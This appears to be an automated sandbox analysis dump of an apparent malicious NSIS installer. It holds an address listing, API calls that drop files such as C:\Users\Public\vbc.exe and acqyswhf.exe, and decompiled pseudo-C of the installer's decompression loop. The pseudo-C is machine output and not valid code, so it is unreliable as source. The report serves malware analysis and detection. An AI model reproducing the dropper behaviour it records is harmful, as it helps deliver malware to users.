                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403912
                                                                                                                                                                                                              0x00403918
                                                                                                                                                                                                              0x0040391a
                                                                                                                                                                                                              0x0040391c
                                                                                                                                                                                                              0x0040392a
                                                                                                                                                                                                              0x0040392c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040392c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040391c
                                                                                                                                                                                                              0x00403910
                                                                                                                                                                                                              0x0040379a
                                                                                                                                                                                                              0x004037a1
                                                                                                                                                                                                              0x004037a1
                                                                                                                                                                                                              0x004036f3
                                                                                                                                                                                                              0x0040376b
                                                                                                                                                                                                              0x0040376b
                                                                                                                                                                                                              0x00403777
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403777
                                                                                                                                                                                                              0x004036fc
                                                                                                                                                                                                              0x00403700
                                                                                                                                                                                                              0x00403736
                                                                                                                                                                                                              0x00403736
                                                                                                                                                                                                              0x00403738
                                                                                                                                                                                                              0x00403740
                                                                                                                                                                                                              0x004037b2
                                                                                                                                                                                                              0x004037b4
                                                                                                                                                                                                              0x004037bb
                                                                                                                                                                                                              0x004037c3
                                                                                                                                                                                                              0x004037c3
                                                                                                                                                                                                              0x004037ce
                                                                                                                                                                                                              0x004037d3
                                                                                                                                                                                                              0x004037e2
                                                                                                                                                                                                              0x004037e6
                                                                                                                                                                                                              0x004037e7
                                                                                                                                                                                                              0x004037f0
                                                                                                                                                                                                              0x004037e9
                                                                                                                                                                                                              0x004037e9
                                                                                                                                                                                                              0x004037e9
                                                                                                                                                                                                              0x004037f6
                                                                                                                                                                                                              0x004037fc
                                                                                                                                                                                                              0x00403802
                                                                                                                                                                                                              0x0040380a
                                                                                                                                                                                                              0x0040380a
                                                                                                                                                                                                              0x00403818
                                                                                                                                                                                                              0x0040381d
                                                                                                                                                                                                              0x0040382f
                                                                                                                                                                                                              0x00403837
                                                                                                                                                                                                              0x0040383d
                                                                                                                                                                                                              0x00403849
                                                                                                                                                                                                              0x0040384f
                                                                                                                                                                                                              0x00403859
                                                                                                                                                                                                              0x0040386f
                                                                                                                                                                                                              0x00403880
                                                                                                                                                                                                              0x00403886
                                                                                                                                                                                                              0x0040388d
                                                                                                                                                                                                              0x00403890
                                                                                                                                                                                                              0x00403896
                                                                                                                                                                                                              0x00403896
                                                                                                                                                                                                              0x0040388d
                                                                                                                                                                                                              0x0040389a
                                                                                                                                                                                                              0x004038a0
                                                                                                                                                                                                              0x004038a0
                                                                                                                                                                                                              0x004038a5
                                                                                                                                                                                                              0x004038a5
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004037e2
                                                                                                                                                                                                              0x00403742
                                                                                                                                                                                                              0x00403744
                                                                                                                                                                                                              0x0040374f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403757
                                                                                                                                                                                                              0x00403762
                                                                                                                                                                                                              0x00403767
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403767
                                                                                                                                                                                                              0x0040372b
                                                                                                                                                                                                              0x0040372d
                                                                                                                                                                                                              0x00403731
                                                                                                                                                                                                              0x00403734
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403734
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040372d
                                                                                                                                                                                                              0x0040367d
                                                                                                                                                                                                              0x00403689
                                                                                                                                                                                                              0x0040368e
                                                                                                                                                                                                              0x00403693
                                                                                                                                                                                                              0x00403695
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040369d
                                                                                                                                                                                                              0x004036a5
                                                                                                                                                                                                              0x004036b6
                                                                                                                                                                                                              0x004036be
                                                                                                                                                                                                              0x004036c0
                                                                                                                                                                                                              0x004036c5
                                                                                                                                                                                                              0x004036c7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004036c7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040362c
                                                                                                                                                                                                              0x004035ed
                                                                                                                                                                                                              0x004035f0
                                                                                                                                                                                                              0x004035f3
                                                                                                                                                                                                              0x004035f9
                                                                                                                                                                                                              0x004035f9
                                                                                                                                                                                                              0x004035f9
                                                                                                                                                                                                              0x004035f9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004035f9
                                                                                                                                                                                                              0x004035f5
                                                                                                                                                                                                              0x004035f7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004035f7
                                                                                                                                                                                                              0x004035a8
                                                                                                                                                                                                              0x004035ab
                                                                                                                                                                                                              0x004035ae
                                                                                                                                                                                                              0x004035b4
                                                                                                                                                                                                              0x004035b4
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004035b4
                                                                                                                                                                                                              0x004035b0
                                                                                                                                                                                                              0x004035b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004035b2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403583
                                                                                                                                                                                                              0x00403583
                                                                                                                                                                                                              0x00403583
                                                                                                                                                                                                              0x00403584
                                                                                                                                                                                                              0x00403584
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00403583
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 00403486
                                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 0040348C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034BF
                                                                                                                                                                                                              • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004034FB
                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 00403502
                                                                                                                                                                                                              • SHGetFileInfoA.SHELL32(0041FD10,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 0040351E
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32(00423F40,NSIS Error,?,00000007,00000009,0000000B), ref: 00403533
                                                                                                                                                                                                              • CharNextA.USER32(00000000), ref: 0040356F
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366C
                                                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040367D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403689
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 0040369D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036A5
                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 004036B6
                                                                                                                                                                                                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036BE
                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004036D2
                                                                                                                                                                                                                • Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
                                                                                                                                                                                                                • Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E
                                                                                                                                                                                                                • Part of subcall function 00403A3B: lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
                                                                                                                                                                                                                • Part of subcall function 00403A3B: lstrcmpiA.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,?,?,?,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
                                                                                                                                                                                                                • Part of subcall function 00403A3B: GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A3B: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92
                                                                                                                                                                                                                • Part of subcall function 00403A3B: RegisterClassA.USER32(00423EE0), ref: 00403BCF
                                                                                                                                                                                                              • ExitProcess.KERNELBASE(?,?,00000007,00000009,0000000B), ref: 0040377B
                                                                                                                                                                                                                • Part of subcall function 00403949: CloseHandle.KERNEL32(FFFFFFFF), ref: 0040395B
                                                                                                                                                                                                                • Part of subcall function 00403949: CloseHandle.KERNEL32(FFFFFFFF), ref: 0040396F
                                                                                                                                                                                                              • OleUninitialize.OLE32 ref: 00403780
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004037A1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038BE
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004038C5
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038DD
                                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004038FC
                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403920
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403943
                                                                                                                                                                                                                • Part of subcall function 00405944: MessageBoxIndirectA.USER32 ref: 0040599F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Exit$FileHandle$CloseEnvironmentPathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                                                                                              • String ID: "$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Nla$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                              • API String ID: 3766654759-1824192116
                                                                                                                                                                                                              • Opcode ID: a9f930016ba51147cddbc041b30f05a75c8ddee43dae306d2646e158f8006db1
                                                                                                                                                                                                              • Instruction ID: 58fd70292e904df403817bc88459b0d0072f96867834376c9e66c0a03af616e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9f930016ba51147cddbc041b30f05a75c8ddee43dae306d2646e158f8006db1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2EC1D7701047806ED7217F659D49B2B3EACEB81706F05447FF582B61E2CB7C8A198B6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406925() {
                                                                                                                                                                                                              				unsigned short _t531;
                                                                                                                                                                                                              				signed int _t532;
                                                                                                                                                                                                              				void _t533;
                                                                                                                                                                                                              				void* _t534;
                                                                                                                                                                                                              				signed int _t535;
                                                                                                                                                                                                              				signed int _t565;
                                                                                                                                                                                                              				signed int _t568;
                                                                                                                                                                                                              				signed int _t590;
                                                                                                                                                                                                              				signed int* _t607;
                                                                                                                                                                                                              				void* _t614;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					if( *(_t614 - 0x40) != 0) {
                                                                                                                                                                                                              						 *(_t614 - 0x34) = 1;
                                                                                                                                                                                                              						 *(_t614 - 0x84) = 7;
                                                                                                                                                                                                              						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                                                                                                              						L132:
                                                                                                                                                                                                              						 *(_t614 - 0x54) = _t607;
                                                                                                                                                                                                              						L133:
                                                                                                                                                                                                              						_t531 =  *_t607;
                                                                                                                                                                                                              						_t590 = _t531 & 0x0000ffff;
                                                                                                                                                                                                              						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                                                                                                              						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                                                                                                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                                                                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                                                                                                              							 *(_t614 - 0x40) = 1;
                                                                                                                                                                                                              							_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                              							 *_t607 = _t532;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *(_t614 - 0x10) = _t565;
                                                                                                                                                                                                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                                                                              							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              							L139:
                                                                                                                                                                                                              							_t533 =  *(_t614 - 0x84);
                                                                                                                                                                                                              							L140:
                                                                                                                                                                                                              							 *(_t614 - 0x88) = _t533;
                                                                                                                                                                                                              							goto L1;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							L137:
                                                                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t614 - 0x88) = 5;
                                                                                                                                                                                                              								goto L170;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							goto L139;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                                                              						__esi =  *(__ebp - 0x60);
                                                                                                                                                                                                              						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                                                              						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                                                              						__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                                                              						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                                                              						__ecx =  *(__ebp - 4);
                                                                                                                                                                                                              						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                                                              						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                                                              						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                                                              						if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                                                              							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                                                              								_t97 = __ebp - 0x38;
                                                                                                                                                                                                              								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							 *(__ebp - 0x38) = 0;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                                                              							__ebx = 0;
                                                                                                                                                                                                              							__ebx = 1;
                                                                                                                                                                                                              							L60:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__edx = __ebx + __ebx;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								_t216 = __edx + 1; // 0x1
                                                                                                                                                                                                              								__ebx = _t216;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								L59:
                                                                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                                                                              									goto L54;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L60;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								L57:
                                                                                                                                                                                                              								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              									 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                                                              									goto L170;
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              								__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								_t202 = __ebp - 0x70;
                                                                                                                                                                                                              								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              								goto L59;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                              							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                              								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__ecx =  *(__ebp - 8);
                                                                                                                                                                                                              							__ebx = 0;
                                                                                                                                                                                                              							__ebx = 1;
                                                                                                                                                                                                              							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                                                              							L40:
                                                                                                                                                                                                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                                                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                                                              							 *(__ebp - 0x48) = __eax;
                                                                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                                                                              							__eax = __eax << 8;
                                                                                                                                                                                                              							__eax = __eax + __ebx;
                                                                                                                                                                                                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              							__edx = __ax & 0x0000ffff;
                                                                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              								__cx = __ax;
                                                                                                                                                                                                              								 *(__ebp - 0x40) = 1;
                                                                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx + 1;
                                                                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              								0x800 = 0x800 - __edx;
                                                                                                                                                                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								L38:
                                                                                                                                                                                                              								__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                              								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                                                              									while(1) {
                                                                                                                                                                                                              										if(__ebx >= 0x100) {
                                                                                                                                                                                                              											break;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                              										__edx = __ebx + __ebx;
                                                                                                                                                                                                              										__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                              										__esi = __edx + __eax;
                                                                                                                                                                                                              										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                              										__ax =  *__esi;
                                                                                                                                                                                                              										 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                              										__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                              										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                              										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                              											__cx = __ax;
                                                                                                                                                                                                              											_t169 = __edx + 1; // 0x1
                                                                                                                                                                                                              											__ebx = _t169;
                                                                                                                                                                                                              											__cx = __ax >> 5;
                                                                                                                                                                                                              											 *__esi = __ax;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                              											0x800 = 0x800 - __edi;
                                                                                                                                                                                                              											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                              											__ebx = __ebx + __ebx;
                                                                                                                                                                                                              											 *__esi = __cx;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                              										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                                                                                                              											L45:
                                                                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              											_t155 = __ebp - 0x70;
                                                                                                                                                                                                              											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									L53:
                                                                                                                                                                                                              									_t172 = __ebp - 0x34;
                                                                                                                                                                                                              									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                                                              									L54:
                                                                                                                                                                                                              									__al =  *(__ebp - 0x44);
                                                                                                                                                                                                              									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                                                                              									L55:
                                                                                                                                                                                                              									if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                              										 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                              										goto L170;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                              									__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                              									__edx =  *(__ebp - 8);
                                                                                                                                                                                                              									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                              									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                              									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                              									 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                              									__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                              									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                              									__eax = __ecx + 1;
                                                                                                                                                                                                              									__edx = 0;
                                                                                                                                                                                                              									_t191 = __eax %  *(__ebp - 0x74);
